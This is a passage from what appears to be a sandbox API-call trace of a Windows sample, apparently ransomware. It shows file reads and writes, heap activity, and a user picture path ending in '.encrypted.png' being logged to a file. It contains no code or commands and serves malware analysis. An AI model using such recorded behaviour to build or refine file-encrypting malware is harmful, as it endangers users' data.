dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.467] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.467] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0041.468] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.468] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.468] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0041.468] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x316d, lpOverlapped=0x0) returned 1 [0041.469] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0041.469] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x316d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.469] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.encrypted.png\r\n", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0041.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x46) returned 0x88e138 [0041.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.encrypted.png\r\n", cchWideChar=70, lpMultiByteStr=0x88e138, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.encrypted.png\r\n", lpUsedDefaultChar=0x0) returned 70 [0041.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0041.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0041.470] WriteFile (in: hFile=0x128, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x45, lpOverlapped=0x0) returned 1 [0041.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0041.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.470] CloseHandle (hObject=0x128) returned 1 [0041.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0041.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0041.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.472] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0041.472] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0041.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0041.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.474] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.474] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.474] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.474] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889550 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0041.474] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0041.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0041.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0041.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0041.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.477] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.480] RtlAllocateHeap 